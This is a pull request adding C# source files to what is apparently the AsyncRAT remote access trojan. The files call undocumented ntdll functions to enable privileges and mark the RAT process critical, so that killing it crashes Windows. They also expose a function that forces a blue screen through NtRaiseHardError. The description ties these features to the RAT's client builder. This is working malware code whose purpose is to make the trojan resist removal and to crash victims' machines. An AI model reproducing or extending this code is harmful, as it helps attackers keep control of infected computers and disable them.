### PR TITLE
Added Lunar.Kernal from private Repo

### DIFF
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Kernal/Integrity.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Kernal/Integrity.cs
@@ -1,0 +1,38 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Lunar.Kernal
+{
+    class KernalHooks
+    {
+        [DllImport("ntdll.dll")]
+        public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);
+
+        [DllImport("ntdll.dll")]
+        public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);
+
+        [DllImport("ntdll.dll", SetLastError = true)]
+        private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
+
+        public static void System()
+        {
+            Process.EnterDebugMode();
+            Boolean t1;
+            RtlAdjustPrivilege(31, true, false, out t1);
+            RtlSetProcessIsCritical(1, 0, 0);
+
+        }
+        public static void User()
+        {
+            Process.EnterDebugMode();
+            Boolean t1;
+            RtlAdjustPrivilege(19, true, false, out t1);
+            RtlSetProcessIsCritical(0, 0, 0);
+        }
+    }
+}

--- a/AsyncRAT-C#/AsyncRAT-Sharp/Kernal/Panic.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Kernal/Panic.cs
@@ -1,0 +1,29 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace Lunar.Kernal
+{
+    class Panic
+    {
+        [DllImport("ntdll.dll")]
+        public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);
+
+        [DllImport("ntdll.dll")]
+        public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);
+
+        [DllImport("ntdll.dll", SetLastError = true)]
+        private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
+
+        public static void RaiseHardError(uint ErrorCode)
+        {
+            Boolean e1;
+            RtlAdjustPrivilege(19, true, false, out e1);
+            uint e2;
+            NtRaiseHardError(ErrorCode, 0, 0, IntPtr.Zero, 6, out e2); //Calls a BSOD with a custom error text
+        }
+    }
+}

--- a/AsyncRAT-C#/AsyncRAT-Sharp/Kernal/Priority.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Kernal/Priority.cs
@@ -1,0 +1,38 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Lunar.Kernal
+{
+    internal class Priority
+    {
+        internal static void high()
+        {
+            using (Process p = Process.GetCurrentProcess())
+                p.PriorityClass = ProcessPriorityClass.High;
+        }
+        internal static void low()
+        {
+            using (Process p = Process.GetCurrentProcess())
+                p.PriorityClass = ProcessPriorityClass.BelowNormal;
+        }
+        internal static void realtime()
+        {
+            using (Process p = Process.GetCurrentProcess())
+                p.PriorityClass = ProcessPriorityClass.RealTime;
+        }
+        internal static void idle()
+        {
+            using (Process p = Process.GetCurrentProcess())
+                p.PriorityClass = ProcessPriorityClass.Idle;
+        }
+        internal static void normal()
+        {
+            using (Process p = Process.GetCurrentProcess())
+                p.PriorityClass = ProcessPriorityClass.Normal;
+        }
+    }
+}

--- a/AsyncRAT-C#/AsyncRAT-Sharp/Kernal/SafeExit.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Kernal/SafeExit.cs
@@ -1,0 +1,28 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Lunar.Kernal
+{
+    class SafeExit
+    {
+        [System.Runtime.InteropServices.DllImport("ntdll.dll")]
+        public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);
+
+        [System.Runtime.InteropServices.DllImport("ntdll.dll")]
+        public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);
+
+        [System.Runtime.InteropServices.DllImport("ntdll.dll", SetLastError = true)]
+        private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
+
+        public static void Exit()
+        {
+            Boolean t1;
+            RtlAdjustPrivilege(19, true, false, out t1);
+            RtlSetProcessIsCritical(0, 0, 0);
+            Environment.Exit(0);
+        }
+    }
+}


### PR DESCRIPTION
Intended for usage with a future update to the Client Builder, specifically "Process Is Critical"
These class's are used to manage aspects of the current running process such as NtRaiseHardError(0xError) and Set Process Critical (BSOD if killed) to for "Process Is Critical" flag in builder (Not included in this Fork)